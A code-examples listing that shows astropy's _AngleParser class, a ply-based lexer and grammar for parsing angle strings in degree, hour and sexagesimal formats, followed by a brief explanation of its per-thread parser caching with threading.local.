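            return
        do_init()
        for fn, args in _queued_calls:
            fn(*args)        # replay everything queued before init
        del _queued_calls[:]
        _initialized = True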
Example #60
0
class _AngleParser:
    """
    Parses the various angle formats including:

       * 01:02:30.43 degrees
       * 1 2 0 hours
       * 1°2′3″
       * 1d2m3s
       * -1h2m3s
       * 1°2′3″N

    This class should not be used directly.  Use `parse_angle`
    instead.
    """
    # For safe multi-threaded operation all class (but not instance)
    # members that carry state should be thread-local. They are stored
    # in the following class member
    _thread_local = threading.local()

    def __init__(self):
        # TODO: in principle, the parser should be invalidated if we change unit
        # system (from CDS to FITS, say).  Might want to keep a link to the
        # unit_registry used, and regenerate the parser/lexer if it changes.
        # Alternatively, perhaps one should not worry at all and just pre-
        # generate the parser for each release (as done for unit formats).
        # For some discussion of this problem, see
        # https://github.com/astropy/astropy/issues/5350#issuecomment-248770151
        if '_parser' not in _AngleParser._thread_local.__dict__:
            (_AngleParser._thread_local._parser,
             _AngleParser._thread_local._lexer) = self._make_parser()

    @classmethod
    def _get_simple_unit_names(cls):
        simple_units = set(
            u.radian.find_equivalent_units(include_prefix_units=True))
        simple_unit_names = set()
        # We filter out degree and hourangle, since those are treated
        # separately.
        for unit in simple_units:
            if unit != u.deg and unit != u.hourangle:
                simple_unit_names.update(unit.names)
        return sorted(simple_unit_names)

    @classmethod
    def _make_parser(cls):
        from astropy.utils import parsing

        # List of token names.
        tokens = (
            'SIGN',
            'UINT',
            'UFLOAT',
            'COLON',
            'DEGREE',
            'HOUR',
            'MINUTE',
            'SECOND',
            'SIMPLE_UNIT',
            'EASTWEST',
            'NORTHSOUTH'
        )

        # NOTE THE ORDERING OF THESE RULES IS IMPORTANT!!
        # Regular expression rules for simple tokens
        def t_UFLOAT(t):
            r'((\d+\.\d*)|(\.\d+))([eE][+−-]?\d+)?'
            # The above includes Unicode "MINUS SIGN" \u2212.  It is
            # important to include the hyphen last, or the regex will
            # treat this as a range.
            t.value = float(t.value.replace('−', '-'))
            return t

        def t_UINT(t):
            r'\d+'
            t.value = int(t.value)
            return t

        def t_SIGN(t):
            r'[+−-]'
            # The above include Unicode "MINUS SIGN" \u2212.  It is
            # important to include the hyphen last, or the regex will
            # treat this as a range.
            if t.value == '+':
                t.value = 1.0
            else:
                t.value = -1.0
            return t

        def t_EASTWEST(t):
            r'[EW]$'
            t.value = -1.0 if t.value == 'W' else 1.0
            return t

        def t_NORTHSOUTH(t):
            r'[NS]$'
            # We cannot use lower-case letters otherwise we'll confuse
            # s[outh] with s[econd]
            t.value = -1.0 if t.value == 'S' else 1.0
            return t

        def t_SIMPLE_UNIT(t):
            t.value = u.Unit(t.value)
            return t

        t_SIMPLE_UNIT.__doc__ = '|'.join(
            f'(?:{x})' for x in cls._get_simple_unit_names())

        t_COLON = ':'
        t_DEGREE = r'd(eg(ree(s)?)?)?|°'
        t_HOUR = r'hour(s)?|h(r)?|ʰ'
        t_MINUTE = r'm(in(ute(s)?)?)?|′|\'|ᵐ'
        t_SECOND = r's(ec(ond(s)?)?)?|″|\"|ˢ'

        # A string containing ignored characters (spaces)
        t_ignore = ' '

        # Error handling rule
        def t_error(t):
            raise ValueError(
                f"Invalid character at col {t.lexpos}")

        lexer = parsing.lex(lextab='angle_lextab', package='astropy/coordinates')

        def p_angle(p):
            '''
            angle : sign hms eastwest
                  | sign dms dir
                  | sign arcsecond dir
                  | sign arcminute dir
                  | sign simple dir
            '''
            sign = p[1] * p[3]
            value, unit = p[2]
            if isinstance(value, tuple):
                p[0] = ((sign * value[0],) + value[1:], unit)
            else:
                p[0] = (sign * value, unit)

        def p_sign(p):
            '''
            sign : SIGN
                 |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_eastwest(p):
            '''
            eastwest : EASTWEST
                     |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_dir(p):
            '''
            dir : EASTWEST
                | NORTHSOUTH
                |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_ufloat(p):
            '''
            ufloat : UFLOAT
                   | UINT
            '''
            p[0] = p[1]

        def p_colon(p):
            '''
            colon : UINT COLON ufloat
                  | UINT COLON UINT COLON ufloat
            '''
            if len(p) == 4:
                p[0] = (p[1], p[3])
            elif len(p) == 6:
                p[0] = (p[1], p[3], p[5])

        def p_spaced(p):
            '''
            spaced : UINT ufloat
                   | UINT UINT ufloat
            '''
            if len(p) == 3:
                p[0] = (p[1], p[2])
            elif len(p) == 4:
                p[0] = (p[1], p[2], p[3])

        def p_generic(p):
            '''
            generic : colon
                    | spaced
                    | ufloat
            '''
            p[0] = p[1]

        def p_hms(p):
            '''
            hms : UINT HOUR
                | UINT HOUR ufloat
                | UINT HOUR UINT MINUTE
                | UINT HOUR UFLOAT MINUTE
                | UINT HOUR UINT MINUTE ufloat
                | UINT HOUR UINT MINUTE ufloat SECOND
                | generic HOUR
            '''
            if len(p) == 3:
                p[0] = (p[1], u.hourangle)
            elif len(p) in (4, 5):
                p[0] = ((p[1], p[3]), u.hourangle)
            elif len(p) in (6, 7):
                p[0] = ((p[1], p[3], p[5]), u.hourangle)

        def p_dms(p):
            '''
            dms : UINT DEGREE
                | UINT DEGREE ufloat
                | UINT DEGREE UINT MINUTE
                | UINT DEGREE UFLOAT MINUTE
                | UINT DEGREE UINT MINUTE ufloat
                | UINT DEGREE UINT MINUTE ufloat SECOND
                | generic DEGREE
            '''
            if len(p) == 3:
                p[0] = (p[1], u.degree)
            elif len(p) in (4, 5):
                p[0] = ((p[1], p[3]), u.degree)
            elif len(p) in (6, 7):
                p[0] = ((p[1], p[3], p[5]), u.degree)

        def p_simple(p):
            '''
            simple : generic
                   | generic SIMPLE_UNIT
            '''
            if len(p) == 2:
                p[0] = (p[1], None)
            else:
                p[0] = (p[1], p[2])

        def p_arcsecond(p):
            '''
            arcsecond : generic SECOND
            '''
            p[0] = (p[1], u.arcsecond)

        def p_arcminute(p):
            '''
            arcminute : generic MINUTE
            '''
            p[0] = (p[1], u.arcminute)

        def p_error(p):
            raise ValueError

        parser = parsing.yacc(tabmodule='angle_parsetab', package='astropy/coordinates')

        return parser, lexer

    def parse(self, angle, unit, debug=False):
        try:
            found_angle, found_unit = self._thread_local._parser.parse(
                angle, lexer=self._thread_local._lexer, debug=debug)
        except ValueError as e:
            if str(e):
                raise ValueError(f"{str(e)} in angle {angle!r}") from e
            else:
                raise ValueError(
                    f"Syntax error parsing angle {angle!r}") from e

        if unit is None and found_unit is None:
            raise u.UnitsError("No unit specified")

        return found_angle, found_unit
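
The `'_parser' not in _thread_local.__dict__` check in __init__ is per-thread memoization of an expensive-to-build, non-thread-safe object: each thread constructs its own lexer/parser once and reuses it on every subsequent call. The same idiom in isolation (make_parser is a stand-in for the real _make_parser):

import threading

class Cached:
    _thread_local = threading.local()

    def parser(self, make_parser):
        # Build at most once per thread; ply parsers are not thread-safe.
        tl = Cached._thread_local
        if '_parser' not in tl.__dict__:
            tl._parser = make_parser()
        return tl._parser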